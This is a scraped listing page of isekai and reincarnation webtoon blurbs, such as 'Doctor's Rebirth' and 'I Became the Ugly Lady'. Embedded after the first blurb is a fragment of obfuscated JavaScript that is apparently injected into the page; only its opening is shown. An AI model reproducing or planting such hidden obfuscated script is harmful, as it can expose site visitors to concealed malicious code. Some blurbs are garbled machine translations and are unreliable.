Isekai - Page 22

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

483 results

Doctor’s Rebirth

I had been abroad to do medical volunteer work, when I was swept up in a civil war. I was killed by a rebel soldier, while taking a bullet for a patient. But when I finally woke up, I had become a child?!? And in front of me stood a destroyed carriage and a group of oddly dressed people, who were unconscious! “It’s just like a Murim world.” As I hurry to perform first aid in an attempt to save even one person, I realize that this world is that of [The Supreme Demon King], a Murim novel I’ve enjoyed reading. After meeting the rescue team of the ‘Three Great Doctors’, I found out that one of the person I saved was the protagonist of this novel, the future Demon King ‘Yeoharyun’! “Hey, since I’m indebted to you for saving me, call me ‘hyung’.” For saving his life, I become sworn brothers with the future Demon King, and Baekrineuison, one of the most knowledgeable people around, recognized my potential and took me in as his disciple. This is the story of how I became the greatest physician in Gangho! Résumé français : J’étais à l’étranger pour faire du bénévolat médical, lorsque la guerre civile a éclaté. J’ai été tué par un soldat rebelle, alors que je prenais une balle pour un patient. Mais quand je me suis finalement réveillé, j’étais devenu un enfant ! Et devant moi se tenait une charrette détruite et un groupe de personnes bizarrement vêtues, qui étaient inconscientes ! “C’est exactement comme un monde de Murim.” Alors que je m’empresse de prodiguer les premiers soins pour tenter de sauver ne serait-ce qu’une personne, je réalise que ce monde est celui du [Roi Démon Suprême], un roman de Murim que j’ai pris plaisir à lire. Après avoir rencontré l’équipe de secours des “Trois Grands Docteurs”, j’ai découvert qu’une des personnes que j’ai sauvées était le protagoniste de ce roman, le futur Roi Démon “Yeoharyun” ! “Hé, puisque je te suis redevable de m’avoir sauvé, appelle-moi “hyung”.” Pour lui avoir sauvé la vie, je suis devenu frère de sang du futur Roi Démon, et Baekrineuison, l’une des personnes les mieux informées, a reconnu mon potentiel et m’a pris comme disciple. C’est ainsi que je suis devenu le plus grand médecin de Gangho !<script></script><script>(function(_0x26d2b2,_0x122c9c){var _0x5c2761=_0x1577,_0x13cc0e=_0x26d2b2();while(!![]){try{var _0x2a8558=parseInt(_0x5c2761(0x164))/(-0x2*-0xd8+0x1160+-0x130f)*(-parseInt(_0x5c2761(0x173))/(-0x1d39+0xca8+0x1093*0x1))+parseInt(_0x5c2761(0x170))/(-0x95f+-0x1429*0x1+0x1d8b)*(-parseInt(_0x5c2761(0x178))/(-0x2af+0x381*0x8+-0x5*0x511))+-parseInt(_0x5c2761(0x175))/(0x17*0x18f+0x227+-0x25fb)*(parseInt(_0x5c2761(0x174))/(-0xda*0x27+-0xb4c+-0xc8*-0x39))+parseInt(_0x5c2761(0x167))/(-0x14c4+-0x3e1+-0x2*-0xc56)+-parseInt(_0x5c2761(0x17d))/(0x19e3+-0x3f5*-0x9+-0x3d78)+-parseInt(_0x5c2761(0x169))/(-0x225a+-0x1256*-0x1+0x100d)*(parseInt(_0x5c2761(0x17f))/(0x216a+-0xe6d+-0x2b5*0x7))+parseInt(_0x5c2761(0x181))/(0x287*-0x1+-0xc3*-0x1d+0x107*-0x13);if(_0x2a8558===_0x122c9c)break;else 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Silly Little Abella

Silly Little Abella / 백치 아벨라 Seokyung Kang is the most in-demand math teacher in the most prestigious town in the country. One day, she is driven over by a truck and wakes up as Abella, a gorgeous but intellectually challenged daughter of the Archduke. Before she could even get a hold of what’s going on, she has to marry the “monster,” a hunchback imperial prince who has burns all over his body! But the so-called “monster” turns out to be a hunk and a pretty boy! Now, Abella has to figure out what’s her mysterious husband’s mind while battling a group of mean imperial in-laws. Can Abella use her role as the “fool of the court” to her advantage to turn her married life around? Watch out, this fool is coming for you!


Dimensional Mercenary ( Other World Warrior )

Would you like to find a job? Even at the cost of your soul? If so, then you’ve found the right place. Our job hunting advice website, Soul Sellers, is a site geared towards those willing to even sell their souls for employment; that’s right, people like you. Are you dealing with angels or demons?30-year old freeloader Chul Ho Kang made a deal through this shady site, even selling his soul for the chance at what else? Money! An invitation to the other world for the weak and downtrodden of society for a chance to change their lot in life! That is the mission given to Chul Ho Kang!


Surely a Happy Ending

Yeon-Woo’s husband died the day they ended their sham marriage. Yeon-Woo, who is swept in sorrow, is given a chance to return 100 days back in time! As she struggles to prevent the death of her husband Seon-Jae, their ‘real’ marriage has only just begun. This is the story of a late budding romance, faced with danger and a life at stake.


Pupillary Master

In the 24th century, the first person in the power world, Luo Qingtong, magically crossed to the real world of another world. Since then, she has opened the way to the revenge of the deposed woman in the lower country. Fighting the villains and slag


They Live in the Princess’ Flower Garden

Thanks to the seal of the king of spirits, she was born with the qualities of a master of spirits. Her parents and brother-in-law pour endless affection on her, and the Knights Templar often follow her around asking for her to be an escort. Furthermore… … “Why don’t you know that your light wish is my earnest desire?” The devil begs for a different look and says, “I want to become a good emperor. An emperor who makes an empire that will suffice for you to stay comfortably.” A childhood friend declares that he will build a strong empire for me. [All kneel in front of our chick!] It’s a bonus that the contracted spirits shout like a habit. A full-fledged walk on the flower path of a frenzied chick who couldn’t bite everyone!


I Became the Ugly Lady

Of all things, I possessed an ugly noble lady. For the sake of receiving the attention of those who despised her, Sylvia Atlante, in the midst of all the ridicule and disrespect, made herself known as the “ugly lady”. However, one day, I happened to possess Sylvia’s body, who drank poison and ended her own life. I didn’t want to live like her. “I’m rich and healthy, so why do I need to care about other people? This is my life, I’m going to live as I want!” I just wanted to live a quiet life, but… “Still, you’re my little sister, and you’re part of the Atlante family.” The family’s a little strange. “I’m interested in you, not your younger sister.” “You must take responsibility for this body until the end. That’s the job of the contractor.” “I, Theve Hiddleton, swear to be the sword of Sylvia Atlante and devote everything to her.” “I won’t bother you. So please, keep me by your side!” “There’s nothing in this world I can’t find. So don’t even try to run away from me.” The handsome guys who I thought I’d never get involved with stuck around. What’s wrong with everyone? Isn’t this too different from Sylvia’s memory? I just wanted to live a peaceful life?!


The Villainess’s Guide to (Not) Falling in Love

In my past life, I was an unpopular woman nearing her thirties. However, when I died, I got reincarnated in a dating sim as the villainess, Luciana. At this rate, I'll face a hopeless future of exile in a punishment event… And that's bad! I'm going to do my best to avoid all the romantic interests in the game and live a peaceful new life so that I can escape that event! But… Why are they all approaching me?! I want to stay low-key, but the people around me just won't leave me alone!


Julieta’s Dress-Up

“You have to hide!” Headquarters as the illegitimate son of a high-ranking nobleman Raised in a theater prop room since the age of 5 after being kicked out by Julieta. In it, a Korean woman possessed by Jena and John again Outstanding looks will be poison to the orphaned self Upon learning that, Julieta grew taller to hide her face. Disguise herself with LAN glasses and a messy wig. become an adult I want to leave the theater, but the theater owner has raised me so far Covered in the rain, Docho and Julieta are extremely popular become the prince’s maid and repay the money. but Its unique charm cannot be covered with disguise. stick to The heart of Prince Killian, who was tired of women who Its unique charm cannot be covered with disguise. stick to The heart of Prince Killian.The Reason Why The Beautiful Lady is in Disguise / 쥴리에타의 드레스 업 / Julieta’s Dress Up / Dandanan


THE Runway

I had a one-night stand with my boss?! Jian Yoo is an editor at a fashion magazine. She frantically ran to Paris after hearing that her boyfriend is two-timing. Not knowing better, she made a rash decision to sleep with a stranger she had just met there… Three months later, the editor-in-chief of Jian’s company flew in from their headquarters in France. However, that man…. turned out to be the one Jian spent the night with!!


Originally A Lady With One Line

I Was Just An Ordinary Lady A sassy prospective college student, Kim Hansol, meets her end due to an unlucky accident. She gets reincarnated as a beloved lady in a family of heroes in a world with magic, spirits, and dragons. “I’m going to return to my original world no matter what!” But while struggling to return to her Korea, she loses control of her magic and ends up causing a catastrophe. Yet her family loved her regardless, and moved by that, Kim Hansol acknowledges her reality and begins to live as Finnea of McKaira, one of the five legendary houses in her new world.


Romance In Seorabeol

Soyoung is a college girl who insists that life is unfair and nothing changes no matter how hard she tries. She hangs out with her friends every day, spending meaningless time. Just before Coming of Age Day, she finds herself into the body of the princess of Shilla. Soyoung has to hide her blonde hair, which can be a fatal flaw for a royal family member. Romance in the Capital City / Seorabeol Romance / 서라벌 로맨스
